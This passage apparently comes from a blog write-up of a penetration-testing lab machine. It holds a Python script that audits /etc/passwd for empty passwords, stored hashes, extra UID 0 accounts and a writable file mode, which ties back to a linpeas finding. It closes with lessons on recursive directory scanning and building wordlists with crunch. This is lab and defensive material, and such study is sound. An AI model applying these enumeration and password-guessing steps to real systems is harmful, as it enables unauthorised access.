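    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) lines; malformed lines are reported rather than parsed."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            problems.append(f"line {lineno}: expected 7 fields, got {len(fields)}")
            continue
        try:
            entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]), *fields[4:]))
        except ValueError:
            problems.append(f"line {lineno}: non-numeric uid/gid")
    return entries, problems


def audit_entries(entries):
    """Content-level findings: hashes in passwd and extra UID 0 accounts."""
    findings = []
    for e in entries:
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field (login without a password)")
        elif e.passwd not in SHADOW_MARKERS:
            findings.append(f"{e.name}: password hash stored in passwd, bypasses /etc/shadow")
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account other than root")
    return findings


def audit_mode(mode):
    """Flag a passwd file that group or others can write (expected mode is 0644)."""
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return [f"passwd file is group/world writable (mode {stat.S_IMODE(mode):04o})"]
    return []


def audit_passwd(text, mode=0o100644):
    """Run every check over passwd content plus the file mode; returns a list of findings."""
    entries, problems = parse_passwd(text)
    return problems + audit_mode(mode) + audit_entries(entries)


def audit_file(path="/etc/passwd"):
    """Audit a real file: stat it for the mode and read its content."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read(), st.st_mode)


if __name__ == "__main__":
    # Mode 0666 mirrors the "writable passwd file" condition linpeas reported.
    for finding in audit_passwd(SAMPLE_PASSWD, mode=0o100666):
        print(finding)
```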

Lessons Learned

  1. The directory scanning on this machine is interesting: after the first scan found /H, visiting that directory returned Forbidden. The right move is to keep scanning its subdirectories and iterate the process.

  2. The crunch tool can be used to generate dictionary files.

Posted @ 2022-12-15 17:11 Jason_huawen